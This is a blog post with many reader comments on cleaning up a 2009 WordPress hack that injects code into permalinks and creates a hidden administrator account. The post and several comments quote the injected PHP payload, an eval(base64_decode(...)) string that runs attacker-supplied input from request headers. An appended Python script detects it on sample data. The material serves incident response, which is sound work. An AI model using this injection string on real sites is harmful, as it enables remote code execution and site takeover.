If you use WordPress, check your blog’s permalinks and RSS feed as soon as possible.
If they are broken and look like this
%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
or
/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_EXECCODE%5D))%7D%7D|.+)&%
or
‘error on line 22 at column 71: xmlParseEntityRef: no name wordpress’ for your feed
then you are the victim of the new hack attempt targeting our blogs.
To fix things:
- Go to Settings → Permalinks and delete the malicious code shown above.
- Go to Users; you will notice there are more administrators than usual.
Hover your mouse over the users and find the one that registered last.
Right-click and copy the edit URL, then paste it into the address bar and increase the number in it by 1.
You should find the hidden admin with a weird code as a first name. Delete the code and make him a subscriber, then return to Users and delete him.
Check the source of the page with administrators just in case, even if you don’t see anything odd. On some older versions the hack hides the increased number of admins too. If that doesn’t work, right-click somewhere on the background and select ‘View Source’, then use search terms like ‘administrator’ or ‘user_’ to find the ID of the hidden admin. Then copy the edit URL and replace the ID, make him a subscriber and delete him as I explained above.
This should fix it. Don’t forget to upgrade your blog to the latest version.
*This was written in a rush to help you, so please forgive the errors.
Thanks for this quick writeup, there seems to have been an outbreak of this over the past few days. My blog (running v2.6.3) was compromised too.
I would also recommend upgrading to the latest WordPress version immediately after fixing the issue, although it hasn’t been verified that 2.8.4 is not vulnerable, as far as I know.
I am hoping the WordPress guys will make some sort of an official announcement about this, because the problem seems to be really widespread.
[...] the end of url links breaking them Check to if you have new admins added to your WordPress too. WordPress Permalink & Rss problems seems to have the latest update info, hope it [...]
This works perfectly.. except I found the secret admin profile by adding 1 to my total amount of users.. like if you have 10234 users signed up.. use 10235…. thanks a lot
Hey – thanks for this well written post!!
Thank you for the fix! When I saw that our site had been hacked I thought I was going to have to spend the rest of the day trying to fix it but your instructions were right on the money and I had the site back up and running within a few minutes. THANK YOU!
-tory
Cleared out the permalink but I can’t find the missing user! Please help!
From SSH:
grep -H -r "var setUserName = function" /var/lib/mysql
…
After this, use phpMyAdmin and search for the string in the infected database (result from grep) … browse the result
1. Remember all “user_id” values from the wp_usermeta table where meta_key = “first_name”
2. From the wp_users table, remove all rows (users) with ID = user_id
3. Remove the row from the wp_usermeta table where meta_key = “first_name”.
—
Set the permalinks again from the WordPress admin (with the real one)
—
Clear all files from the WordPress cache, etc…
Yes – thanks for having this here. Easy fix. Do we know for sure that there are no lingering repercussions? Some sort of trojan that was put into the blog or backend that will unveil itself down the road despite these fixes, and despite upgrading to 2.8.4?
Thanks so much for the help. It was an easy fix and understandable.
@aw – I’ve not heard of any more issues so far. I will update if there are.
@Jeffrey – Look at the picture. Search for the user with the highest number and increase it by 1.
@Byrev – ms
THANKS very much for this posting. I have published another method of finding and removing the hidden user, and it doesn’t require SSH access to your web server. More details are in my blog at:
http://blog.nachotech.com/?p=125
Cheers,
Iggy
[...] The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
[...] Today I found my permalinks were all screwed up, and guess what I found another admin popped up from who knows where. Was easy enough to fix once I found this article, http://www.journeyetc.com/2009/09/04/wordpress-permalink-rss-problems/. [...]
Looks like no admin users are added to WordPress 2.7, although the permalinks are still broken. Can anyone else confirm?
I had this hack happen to me today with this string:
/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/
There was NO additional admin added.
WP 2.82.
What is interesting is that the hacker somehow disabled the Tools → Upgrade code. It normally tells you you have 2.82 and need to upgrade to 2.84. The bottom of the screen showed the need to upgrade, but the code under the upgrade tool said it was at the latest version with no upgrade needed!
Thank you very much for writing this post — I have used it to resolve this issue on a student blog. I wouldn’t have figured it out as quickly without your help!
[...] that we do not recognize. It is very likely that we will not be able to access this stealth account. Read Journey Etc to find out [...]
Awesome and helpful. I used this simple system to delete the rogue admin and restore normalcy to my blog. Thank you very much!
All success
Dr.Mani
[...] Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
[...] 0 Hey WordPress fan! If you want to stay up to date on new blog posts, follow along via our RSS feed or Twitter profile. At the moment a great many old WordPress installations are being attacked by malicious parties. Otto, a key developer of WordPress, posted this notice. There are two ways to find out whether your WordPress installation is affected: There are strange additions to the pretty permalinks, such as example.com/category/post-title/%&(%7B$%7Beval(base64_decode($_SERVER%5BHTTP_REFERER%5D))%7D%7D|.+)&%/. The keywords are “eval” and “base64_decode.” The second clue is that a “back door” was created by a “hidden” Administrator. Check your site users for “Administrator (2)” or a name you do not recognize. You will probably be unable to access that account, but Journey Etc. has a possible solution. [...]
Thanks, this helped a lot…..
Thank you so much for this, getting rid of the blighter was doing my head in. It has taught me a valuable lesson in keeping secure.
If you are having trouble locating the user ID, I found the hidden administrator by opening up the HTML browser source in Notepad and checking through users that way. It says exactly what user ID the hacker administrator is.
Thanks
[...] more here and there will no doubt be plenty coming on WordPress itself and further advice appearing online as [...]
[...] This post offers some solutions if you have already been hacked. Remove the extra permalink code in Settings → Permalinks, remove the extra admin account, and (obviously) upgrade to the latest version of WordPress. [...]
Thanks so much! None of the permalinks in my 3 WP installations were affected, but I found a hidden Administrator in my travel log. Using the tips from here: http://blog.nachotech.com/?p=125, I found its userid via pagesource and then deleted it – only to have another one pop up, and then another one (I could actually see them appear when I clicked refresh). After that I finally managed to upgrade, and now it seems fine… *crosses fingers*
@Admin any time
have a nice blogging !
[...] (2)” or a name you do not recognize. You will probably not be able to access the account, but Journey Etc has a possible [...]
[...] If you can no longer log in, check out this possible solution. [...]
Thank you for this posting.
I translated the solution into Japanese and posted it at http://sakuratan.biz/archives/1204. (Please contact me if you don’t want to permit me the translation.)
Thanks!
[...] WordPress Permalink and RSS Problems [...]
The secret user’s first name is a javascript function. I won’t reproduce it here but… injection attack? After all this time? Is that the vulnerability or did the hack happen some other way?
Thanks so much for posting this! I only have one admin (me), so I did a “view source” and searched for “administrator” and found the hidden name. In case that helps anyone.
Thanks again!
[...] You will notice the hack as it leaves a bunch of code in the permalinks. You can read more about it here as well as a solution. Journeyetc.com. [...]
To find the hidden admin you may need to set the user_ID field to +2 instead of +1. This was required in my case.
If you’re handy with phpadmin you can browse the wp_users table and look at the last record to fetch the user_ID.
I’ve had the same hack with the permalink problem, and that was an easy fix. I also now have a hidden administrator and have found the user ID in the source code. I must be braindead right now though, I am not understanding your guide on how to get rid of this user (overcomplicating and overlooking the simple and obvious most likely). You said “paste into address bar”, are you referring to the browser nav bar? That gets me nowhere, and the only other place I can see to paste is into the search bar on the admin user page and that isn’t getting me anywhere either.
Please disregard my last comment, I answered my own question. After rethinking what I was doing, I was just overcomplicating my thought process. Went back had another look and the answer was right in front of me. Hidden user and malicious java script are now gone.
[...] found another great article from Journey etc explaining a different way to find a hidden [...]
Scooter, same problem. how did you go about searching?
Ok, got it. Just pasted it after the URL of WP admin. Btw, the hidden admin name is monroeescobar72. Any similarities with others?
Had to delete about 10 legitimate users in a failed trial and error, too.
Unable to locate the hidden admin.
I upgraded my blog two days back. But my blog (WP ver 2.8.4) was attacked today. I fixed the permalink, as per your instructions, and it seems the issue is resolved, or is there any other method to find the hidden user?
Thanks a ton for this post.
One seemingly reliable way I was able to find the rogue account(s) was by querying the database. I don’t expect everyone to have access to their database, but querying ‘wp_users’ for any user who does not have an email address for us brought up the rogue admin account.
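The database checks suggested in the comments above (the "var setUserName = function" string in a first_name row, an administrator with no email address), together with the permalink indicator from the post, combined into one read-only audit. This is an added example, not code from the post or its commenters: it runs on constructed rows in an in-memory SQLite database and assumes the default wp_ prefix, the permalink_structure option and the wp_capabilities meta key.

```python
import re
import sqlite3

# Indicators from the page: eval/base64_decode in the permalink setting and
# "var setUserName = function" in first_name; "<script" is an added assumption.
PERMALINK_IOC = re.compile(r"eval\s*\(|base64_decode", re.I)
SCRIPT_IOC = re.compile(r"<script|var\s+setUserName\s*=\s*function", re.I)

def audit(db, prefix="wp_"):
    """Read-only audit; returns a list of (check, detail) findings."""
    findings = []
    for (value,) in db.execute(
            f"SELECT option_value FROM {prefix}options "
            "WHERE option_name = 'permalink_structure'"):
        if PERMALINK_IOC.search(value or ""):
            findings.append(("permalink", value))
    # Read users from the tables, not the admin screen, so an account that
    # injected script hides from the Users page is still listed.
    rows = db.execute(f"""
        SELECT u.ID, u.user_login, COALESCE(u.user_email, ''),
               COALESCE(c.meta_value, ''), COALESCE(f.meta_value, '')
        FROM {prefix}users u
        LEFT JOIN {prefix}usermeta c ON c.user_id = u.ID AND c.meta_key = '{prefix}capabilities'
        LEFT JOIN {prefix}usermeta f ON f.user_id = u.ID AND f.meta_key = 'first_name'
        ORDER BY u.ID""")
    for uid, login, email, caps, first_name in rows:
        if SCRIPT_IOC.search(first_name):
            findings.append(("script_in_first_name", (uid, login)))
        if "administrator" in caps and not email.strip():
            findings.append(("admin_without_email", (uid, login)))
    return findings

def sample_db():
    """Constructed data in the shape of WordPress's options/users/usermeta."""
    db = sqlite3.connect(":memory:")
    db.executescript("""
        CREATE TABLE wp_options (option_name TEXT, option_value TEXT);
        CREATE TABLE wp_users (ID INTEGER, user_login TEXT, user_email TEXT);
        CREATE TABLE wp_usermeta (user_id INTEGER, meta_key TEXT, meta_value TEXT);
    """)
    admin = 'a:1:{s:13:"administrator";b:1;}'
    db.execute("INSERT INTO wp_options VALUES ('permalink_structure', ?)",
               (r"/%postname%/%&({${eval(base64_decode($_SERVER[HTTP_REFERER]))}}|.+)&%/",))
    db.executemany("INSERT INTO wp_users VALUES (?, ?, ?)",
                   [(1, "owner", "owner@example.com"), (2, "reader", "r@example.com"),
                    (3, "hidden-example", "")])  # constructed rogue account
    db.executemany("INSERT INTO wp_usermeta VALUES (?, ?, ?)",
                   [(1, "wp_capabilities", admin), (1, "first_name", "Ann"),
                    (2, "wp_capabilities", 'a:1:{s:10:"subscriber";b:1;}'), (3, "wp_capabilities", admin),
                    (3, "first_name", "var setUserName = function(){ /* constructed */ };")])
    return db

if __name__ == "__main__":
    print(audit(sample_db()))
```

An empty list only means these three indicators are absent; it says nothing about files changed on disk.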
I have updated my instructions on finding and removing the hidden user(s). Perhaps some of you will find it helpful:
http://blog.nachotech.com/?p=125
Thank you, this was tremendously helpful.
[...] quick fix was to edit my permalink settings, removing the funky [...]
[...] journeyetc.com responded and describe the attack: [...]
[...] and here [...]
[...] If you’ve already been cyber-robbed, the instructions I used to fix Foodie Fights were on Journey Etc. The comments were helpful [...]
I followed your instructions and I reset the permalinks. So am I clean? I asked the question on the WordPress forum and they suggested your fix was not enough and that I needed to completely reload all the files, including plugins, with new, clean versions. That seems a lot of work to me if I don’t need to.
I deleted the rogue “administrator” by going through the database and looking up wp_users. The last one had no email address, and searching for the user name in WordPress Users section came up empty, so that had to be the hidden one.
YOU SAVED MY BLOG.
I love you.
Thank you.
I did not see any new Administrators, but I tried your trick of adding 1 and did not get a “rogue” administrator. Through phpMyAdmin I went into my database and did not see any new users in wp_users or wp_usermeta. Has anyone heard of this permalink hack not adding a “rogue” administrator? I’m worried I’ve missed something but tried everything I can think of.
[...] WP Permalink RSS problems. [...]
I am trying to help a friend with an infected installation. When I go to users I see two admins, yet when I click the admin tab it changes to 1 (and it is my friend’s admin listing). When I try to view source my virus scanner detects a couple of malicious entities (for lack of a better word – haha) and it won’t let me see the source. I also tried scanning down through the list of subscribers (there are lots) – on page 8 I quickly saw an administrator, but it disappeared right away and the virus scanner kicked in again.
Any thoughts?
Can I physically remove this admin entry from within phpMyAdmin?
Thanks
[...] More information on how to deal with this hack can be found on the weblog Journey Etc.. [...]
Hi, really great post, I hope to read more posts from your amazing blog, you are welcome to read about visiting Israel at Christmas holiday! It's a really great time
Excuse me for writing Off-Topic … which WP template are you using? Looks awesome!!
Hey,
Thanks for the compliments. I’m using the ‘Journey Theme’. It is custom made, so you won’t be able to find it elsewhere. If you are interested to get in touch with the people who made it, let me know – it cost about $450 (design+coding)
How to remove Trojan: Backdoor
http://www.tips29.com/2009/01/how-to-remove-trojan-backdoor.html
Hi, great post & helpful comments but after having found the ‘hidden’ user, I still don’t see how to get the url to paste into the browser…it doesn’t seem to be there. Is there a way I can delete it directly from the users.php file? Thanks.
[...] After a long search in the Internet, I found a crude way to solve it thanks to http://www.journeyetc.com/uncategorized/wordpress-permalink-rss-problems/ [...]
[...] 2. The existence of a “backdoor” created by a “hidden” Administrator. You can suspect a user named “Administrator (2)” or anything else you do not recognize. After a while you may no longer be able to access the administrator dashboard. For the easiest solution to this problem, please read the post on the Journey Etc blog. [...]
That’s why people should not use open source software.
Great post. I agree with masterb
Thanks so much… Problem solved!
[...] > WordPress Permalink RSS problems [...]
[...] is required. To read the statement that was made, see here; for a suggested solution on the topic, see here. You can also look at a discussion of the topic in the forum here. [...]
F*ckin’ tremendous issues here. I’m very happy to see your post. Thank you a lot and I’m looking forward to touch you. Will you kindly drop me an e-mail?